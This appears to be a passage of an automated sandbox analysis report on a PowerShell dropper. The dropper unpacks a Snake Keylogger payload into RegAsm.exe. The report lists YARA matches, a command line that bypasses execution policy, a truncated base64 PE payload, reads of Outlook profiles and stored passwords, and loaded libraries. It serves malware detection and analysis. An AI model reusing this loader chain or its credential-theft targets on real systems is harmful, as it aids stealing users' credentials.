            Source: 4.2.x.exe.2d0b410.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 6.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 4.2.x.exe.2d1ca44.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 4.2.x.exe.2d2e09c.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 4.2.x.exe.2d2e09c.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 4.2.x.exe.2d1ca44.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 4.2.x.exe.2d0b410.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 00000006.00000002.3753256474.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 00000004.00000002.1327298424.0000000002CD2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: Process Memory Space: powershell.exe PID: 7856, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: x.exe PID: 8140, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: Process Memory Space: RegAsm.exe PID: 8184, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: x.exe.0.drStatic PE information: Section: 9z.85d ZLIB complexity 1.000380797955975
            Source: 4.2.x.exe.2d0b410.2.raw.unpack, UltraSpeed.csCryptographic APIs: 'TransformFinalBlock'
            Source: 4.2.x.exe.2d0b410.2.raw.unpack, COVIDPickers.csCryptographic APIs: 'TransformFinalBlock'
            Source: 4.2.x.exe.2d1ca44.0.raw.unpack, UltraSpeed.csCryptographic APIs: 'TransformFinalBlock'
            Source: 4.2.x.exe.2d1ca44.0.raw.unpack, COVIDPickers.csCryptographic APIs: 'TransformFinalBlock'
            Source: 4.2.x.exe.2d2e09c.1.raw.unpack, UltraSpeed.csCryptographic APIs: 'TransformFinalBlock'
            Source: 4.2.x.exe.2d2e09c.1.raw.unpack, COVIDPickers.csCryptographic APIs: 'TransformFinalBlock'
            Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winPS1@9/7@3/3
            Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\x.exe.logJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7900:120:WilError_03
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nd5iwhm4.eja.ps1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
            Source: RegAsm.exe, 00000006.00000002.3758762382.00000000041FD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: foreign.ps1Virustotal: Detection: 47%
            Source: foreign.ps1ReversingLabs: Detection: 40%
            Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\foreign.ps1"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Windows\System32\notepad.exe "C:\Windows\System32\notepad.exe" "C:\Users\user\Desktop\foreign.ps1"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\System32\notepad.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\notepad.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\notepad.exeSection loaded: mrmcorer.dllJump to behavior
            Source: C:\Windows\System32\notepad.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\notepad.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\notepad.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Windows\System32\notepad.exeSection loaded: efswrt.dllJump to behavior
            Source: C:\Windows\System32\notepad.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\notepad.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\notepad.exeSection loaded: twinapi.appcore.dllJump to behavior
            Source: C:\Windows\System32\notepad.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Windows\System32\notepad.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Windows\System32\notepad.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Windows\System32\notepad.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Windows\System32\notepad.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\System32\notepad.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\notepad.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\notepad.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\notepad.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\notepad.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\notepad.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Windows\System32\notepad.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\System32\notepad.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11659a23-5884-4d1b-9cf6-67d6f4f90b36}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: Binary string: BVZXCH33.pdb source: powershell.exe, 00000000.00000002.1326897223.000000000616E000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000004.00000000.1311459662.0000000000992000.00000002.00000001.01000000.0000000A.sdmp, x.exe.0.dr
            Source: Binary string: BVZXCH33.pdb\f source: powershell.exe, 00000000.00000002.1326897223.000000000616E000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000004.00000000.1311459662.0000000000992000.00000002.00000001.01000000.0000000A.sdmp, x.exe.0.dr

            Data Obfuscation

            barindex
            Found suspicious powershell code related to unpacking or dynamic code loading
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEFAK
            Source: x.exe.0.drStatic PE information: 0x89EBFCA9 [Wed Apr 29 18:17:13 2043 UTC]
            Source: x.exe.0.drStatic PE information: section name: 9z.85d
            Source: x.exe.0.drStatic PE information: section name:
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_066C73B0 push 5D906C79h; ret 6_2_066C73D3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_066C71F8 push 5D906C79h; ret 6_2_066C7383
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_06A3E537 push es; ret 6_2_06A3E540
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_06A3E543 push es; ret 6_2_06A3E544
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_06A3616D push esp; ret 6_2_06A361A1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_06A37640 push esp; ret 6_2_06A3764D
            Source: x.exe.0.drStatic PE information: section name: 9z.85d entropy: 7.997773377752887
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\x.exeJump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
